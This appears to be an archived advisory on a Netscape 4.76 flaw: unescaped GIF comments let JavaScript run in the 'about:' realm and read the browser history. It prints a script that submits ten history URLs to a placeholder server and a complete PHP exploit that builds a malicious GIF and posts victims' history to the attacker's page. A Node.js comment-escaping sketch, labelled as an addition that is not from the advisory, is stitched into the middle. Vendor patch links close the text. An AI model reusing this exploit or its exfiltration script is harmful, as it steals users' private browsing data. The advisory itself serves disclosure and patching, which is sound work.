COMMAND

    Netscape

SYSTEMS AFFECTED

    Netscape prior to 4.77

PROBLEM

    Florian Wesch found the following.  The Netscape browser does not
    escape the GIF file comment in the image information page.  This
    allows JavaScript execution in the "about:" protocol and can, for
    example, be used to upload the history (about:global) to a
    web server.

    Netscape does not allow JavaScript to access documents from a
    different domain.  This stops a script from one domain that
    tries to mess around with login forms or private data from
    another domain.  The following error message is shown:

        "access disallowed from scripts at <javascriptdomain> to documents at another domain."

    Now there is the protocol  "about:" that is used for  some special
    tasks.

        about:          - shows Netscape version and copyrights
        about:blank     - shows a blank document
        about:config    - shows Browser configuration.
        about:global    - shows Information about the Netscape global history
        about:<url>     - shows Information about the specified url
        ..

    There are some other  about: documents (try grepping  the netscape
    binary).

    about:global is very interesting  since all visited documents  are
    listed there.   So Florian  tried to  find a  way to  access  this
    information.

    Florian created a frameset with 2 frames.  The first frame (called
    foo) contains about:global.  Using <frame src="about:global">,
    <meta http-equiv="refresh" content="10; URL=about:global"> or
    document.location.href="about:global"; for setting this URL did
    not work.  So Florian used the following trick to make it work:

        <base href="about:">
        <form action="global" name="loadhistory">
            <input type="submit">
        </form>
        <script language="javascript">
            document.loadhistory.submit();
        </script>

    The intention is that the second frame (called bar) grabs 10 URLs
    from the first frame using JavaScript and sends them to the server.

    Accessing parent.frames["foo"].document.links does not work  since
    foo is  displaying an  about: document  and bar  is a  normal http
    document:  "access disallowed from scripts at blah to documents.."

    So he tried to find a way to start a script within an
    about: document.  about:<someurl> comes to mind since it shows
    a lot of server-specified values.

    First he tried to inject  javascript using the url of  the script.
    But since this url is encoded (space => %20 etc.) there is no  way
    in.   Modifying the  Content-Type (File  MIME Type)  did not  work
    either because Netscape opens a "Save as..." window when supplying
    an unknown mimetype.

    Netscape shows the  comment included in  gif files.   A quick test
    showed that  the comment  is not  escaped.   So Javascript  in gif
    comments is executed  in the about:  realm.  This  means that this
    script can then access the content of about:global.  Nice.
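
    The missing step is escaping the comment before it is written into
    the information page.  The following Node.js sketch is an added
    example, not code from the advisory or from Netscape: it walks the
    GIF block structure, collects comment extensions (including ones
    split over several sub-blocks) and escapes them before building
    the markup.  All function names and the sample file are assumptions
    made for illustration.

```javascript
const GIF_EXT = 0x21, GIF_COMMENT = 0xfe, GIF_IMAGE = 0x2c, GIF_TRAILER = 0x3b;
// Read a chain of data sub-blocks at pos; returns [joined data, next position].
function readSubBlocks(buf, pos) {
  const parts = [];
  for (;;) {
    if (pos >= buf.length) throw new Error("truncated sub-block chain");
    const size = buf[pos++];
    if (size === 0) break; // block terminator
    if (pos + size > buf.length) throw new Error("sub-block overruns file");
    parts.push(buf.subarray(pos, pos + size));
    pos += size;
  }
  return [Buffer.concat(parts), pos];
}
// Byte length of the color table announced by a packed-flags byte (0 if absent).
const colorTableBytes = (packed) => (packed & 0x80 ? 3 * (1 << ((packed & 7) + 1)) : 0);

// Return every comment extension in the file as a raw, untrusted latin1 string.
function gifComments(buf) {
  const sig = buf.toString("latin1", 0, 6);
  if (buf.length < 13 || (sig !== "GIF87a" && sig !== "GIF89a")) throw new Error("not a GIF");
  let pos = 13 + colorTableBytes(buf[10]); // header, screen descriptor, global table
  const comments = [];
  while (pos < buf.length && buf[pos] !== GIF_TRAILER) {
    const tag = buf[pos++];
    let data;
    if (tag === GIF_EXT) {
      const label = buf[pos++];
      [data, pos] = readSubBlocks(buf, pos);
      if (label === GIF_COMMENT) comments.push(data.toString("latin1"));
    } else if (tag === GIF_IMAGE) {
      if (pos + 9 > buf.length) throw new Error("truncated image descriptor");
      pos += 9 + colorTableBytes(buf[pos + 8]) + 1; // descriptor, local table, LZW code size
      [data, pos] = readSubBlocks(buf, pos);
    } else {
      throw new Error("unknown block 0x" + tag.toString(16));
    }
  }
  return comments;
}

// Encode markup characters, control bytes and high bytes as numeric references.
function escapeHtml(s) {
  return s.replace(/[&<>"'\u0000-\u001f\u007f-\u00ff]/g, (c) => "&#" + c.charCodeAt(0) + ";");
}
// Build the info-page rows; the comment only reaches the markup after escaping.
function infoPageRows(buf) {
  return gifComments(buf).map((c) => "<tr><td>Comment:</td><td>" + escapeHtml(c) + "</td></tr>").join("");
}

// Constructed sample: 1x1 GIF whose comment is split over two sub-blocks.
const SAMPLE_COMMENT = '<b>note</b> & "more"';
const SAMPLE_GIF = Buffer.concat([
  Buffer.from("GIF89a", "latin1"), Buffer.from([1, 0, 1, 0, 0x00, 0, 0]),
  Buffer.from([GIF_EXT, GIF_COMMENT, 11]), Buffer.from("<b>note</b>", "latin1"),
  Buffer.from([9]), Buffer.from(' & "more"', "latin1"), Buffer.from([0]),
  Buffer.from([GIF_IMAGE, 0, 0, 0, 0, 1, 0, 1, 0, 0x00, 2, 2, 0x44, 0x01, 0, GIF_TRAILER]),
]);
```

    The same gifComments() output can be used to flag uploaded or
    cached images whose comment contains markup characters at all.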

    The following  script included  in the  comment reads  10 urls  in
    the about:global frame (foo), stores them in the form and  finally
    submits this form.

        <form action=http://bla/ns476history.php target=_parent name=s method=get>
        <input name=u>
        </form>
        <script>
            f=parent.frames["foo"].document;
            l="";
            for(i=0;i<10;i++)
                l+=f.links[i]+"|";
            document.s.u.value=l;
            document.s.submit();
        </script>

    The server now has 10 URLs from about:global.  Accessing
    about:config should be possible too, but we did not try it.

    Exploit:

    <?
    /*
    Netscape 4.76 gif comment flaw

    Florian Wesch <fw@dividuum.de>
    http://dividuum.de
    */

    $self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF;
    if (strlen($self)>64) {
        echo "Url of $self is too long. 64 maximum.<br>";
        echo "You can change this but I think 64 should be enough for anybody ;-)";
        exit;
    }

    if (!isset($mode)) $mode="intro";

    // If urllist is submitted
    if (isset($u)) $mode="showhist";

    switch ($mode) {
        case "intro":
            ?>
            <html>
                <body>
                    <a href="<? echo $self; ?>?mode=frameset">Submit 10 urls of your history</a><br>
                </body>
            </html>
            <?
            break;
        case "frameset":
            ?>
            <html>
                <frameset rows="50%,50%" border=0 frameborder=0 framespacing=0>
                    <frame src="<? echo $self; ?>?mode=loadhistory" name="foo" scrolling=no>
                    <frame src="<? echo $self; ?>?mode=showimageinfo" name="bar" scrolling=no>
                </frameset>
            </html>
            <?
            break;
        case "loadhistory":
            // replaces the current document with about:global using javascript
            ?>
            <html>
                <base href="about:">
                <form action="global" name="loadhistory">
                    <input type="submit">
                </form>
                <script language="javascript">
                    document.loadhistory.submit();
                </script>
            </html>
            <?
            break;
        case "showimageinfo":
            ?>
            <html>
                <head>
                    <meta http-equiv="refresh" content="5; URL=about:<? echo $self; ?>?mode=evilgif">
                </head>
                <body>
                    Waiting 5 seconds...<br>
                    <img src="<? echo $self; ?>?mode=evilgif">
                </body>
            </html>
            <?
            break;
        case "evilgif":
            // Gifs are supposed to be compressed. The program I
            // used sucks :-)
            header("Content-type: image/gif");
            $gif ="4749463839610a000a00f70000ffffffffffccffff";
            $gif.="99ffff66ffff33ffff00ffccffffccccffcc99ffcc6";
            $gif.="6ffcc33ffcc00ff99ffff99ccff9999ff9966ff9933";
            $gif.="ff9900ff66ffff66ccff6699ff6666ff6633ff6600f";
            $gif.="f33ffff33ccff3399ff3366ff3333ff3300ff00ffff";
            $gif.="00ccff0099ff0066ff0033ff0000fffffffffffffff";
            $gif.="fffffffffffffffffffffffffffffffffffffffffff";
            $gif.="fffffffffffffffffffffffffffffffffffffffffff";
            $gif.="fffffffffffffffffffffffffffffffffffffffffff";
            $gif.="ffffffffffffffffffffffff0000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="00000000000000021feff";
            $gif.=bin2hex(sprintf("%77s%s",

          /*"<form action=".$self,' target=_parent name=s method=get >'.*/
          /* I'm using POST so the submitted urls do not appear in the logfile */
            "<form action=".$self,' target=_parent name=s method=post>'.
                '<input name=u>'.
            '</form>'.
            '<script>'.
                'f=parent.frames["foo"].document;'.
                'l="";'.
              /*'for(i=0;i<f.links.length;i++)'.*/
                'for(i=0;i<10            ;i++)'.
                    'l+=f.links[i]+"|";'.
                'document.s.u.value=l;'.
                'document.'.chr(255).'s.submit();'.
            '</script>'));

            $gif.=              "00000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="00000000000002c000000000a000a00000813004708";
            $gif.="1c48b0a0c18308132a5cc8b061c28000003b";
            echo pack("H".strlen($gif), $gif);
            break;
        case "showhist":
            $urls=explode("|",$u);
            echo "<h1>Top 10 urls in about:global</h1>";
            foreach ($urls as $url) {
                echo "<a href=$url>$url</a><br>";
            }
        };
    ?>

SOLUTION

    Disable Javascript or upgrade to 4.77.

    For RedHat:

        ftp://updates.redhat.com/6.2/en/os/SRPMS/netscape-4.77-0.6.2.src.rpm
        ftp://updates.redhat.com/6.2/en/os/SRPMS/netscape-alpha-4.77-0.6.2.src.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/netscape-common-4.77-0.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/netscape-communicator-4.77-0.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/netscape-navigator-4.77-0.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/netscape-common-4.77-0.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/netscape-communicator-4.77-0.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/netscape-navigator-4.77-0.6.2.i386.rpm
        ftp://updates.redhat.com/7.0/en/os/SRPMS/netscape-4.77-1.src.rpm
        ftp://updates.redhat.com/7.0/en/os/SRPMS/netscape-alpha-4.77-1.src.rpm
        ftp://updates.redhat.com/7.0/en/os/alpha/netscape-common-4.77-1.alpha.rpm
        ftp://updates.redhat.com/7.0/en/os/alpha/netscape-communicator-4.77-1.alpha.rpm
        ftp://updates.redhat.com/7.0/en/os/alpha/netscape-navigator-4.77-1.alpha.rpm
        ftp://updates.redhat.com/7.0/en/os/i386/netscape-common-4.77-1.i386.rpm
        ftp://updates.redhat.com/7.0/en/os/i386/netscape-communicator-4.77-1.i386.rpm
        ftp://updates.redhat.com/7.0/en/os/i386/netscape-navigator-4.77-1.i386.rpm

    For Immunix OS:

        http://immunix.org/ImmunixOS/6.2/updates/RPMS/netscape-common-4.77-0.6.2_StackGuard.i386.rpm
        http://immunix.org/ImmunixOS/6.2/updates/RPMS/netscape-communicator-4.77-0.6.2_StackGuard.i386.rpm
        http://immunix.org/ImmunixOS/6.2/updates/RPMS/netscape-navigator-4.77-0.6.2_StackGuard.i386.rpm
        http://immunix.org/ImmunixOS/6.2/updates/SRPMS/netscape-4.77-0.6.2_StackGuard.src.rpm
        http://immunix.org/ImmunixOS/7.0/updates/RPMS/netscape-common-4.77-1_imnx.i386.rpm
        http://immunix.org/ImmunixOS/7.0/updates/RPMS/netscape-communicator-4.77-1_imnx.i386.rpm
        http://immunix.org/ImmunixOS/7.0/updates/RPMS/netscape-navigator-4.77-1_imnx.i386.rpm
        http://immunix.org/ImmunixOS/7.0/updates/SRPMS/netscape-4.77-1_imnx.src.rpm

    For Conectiva Linux:

        ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/netscape-navigator-4.77-1cl.i386.rpm

    For Progeny Linux:

        1. Ensure that your  /etc/apt/sources.list file has a  URI for
           Progeny's update repository:

           deb http://archive.progeny.com/progeny updates/newton/

        2. Update your cache of available packages for apt(8).

           # apt-get update

        3. If you are  currently running the Netscape  browser, please
           exit the application.

        4. Using  apt(8),  install  the  new  package.   apt(8)   will
           download the  update, verify  its integrity  with md5,  and
           then install the package on your system with dpkg(8).

           # apt-get install netscape

    For Debian Linux:

        http://security.debian.org/dists/stable/updates/contrib/source/netscape4.base_4.77-1.tar.gz
        http://security.debian.org/dists/stable/updates/contrib/source/netscape4.base_4.77-1.dsc
        http://security.debian.org/dists/stable/updates/main/source/netscape4.77_4.77-2.dsc
        http://security.debian.org/dists/stable/updates/main/source/netscape4.77_4.77-2.diff.gz
        http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-ja-resource-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-java-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-ko-resource-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-zh-resource-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-all/navigator-nethelp-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-all/communicator-nethelp-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-all/communicator-spellchk-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/contrib/binary-i386/netscape_4.77-1_i386.deb
        http://security.debian.org/dists/stable/updates/contrib/binary-i386/netscape-base-4-libc5_4.77-1_i386.deb
        http://security.debian.org/dists/stable/updates/contrib/binary-i386/netscape-base-4_4.77-1_i386.deb
        http://security.debian.org/dists/stable/updates/contrib/binary-i386/navigator_4.77-1_i386.deb
        http://security.debian.org/dists/stable/updates/contrib/binary-i386/communicator_4.77-1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/netscape-base-477_4.77-2_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/netscape-smotif-477_4.77-2_i386.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-i386/netscape-base-477_4.77-2_i386.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-i386/navigator-base-477_4.77-2_i386.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-i386/navigator-smotif-477_4.77-2_i386.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-i386/communicator-base-477_4.77-2_i386.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-i386/communicator-smotif-477_4.77-2_i386.deb

    For Turbo Linux:

        ftp://ftp.turbolinux.com/pub/updates/6.0/security/netscape-communicator-4.77-3.i386.rpm
        ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/netscape-communicator-4.77-3.src.rpm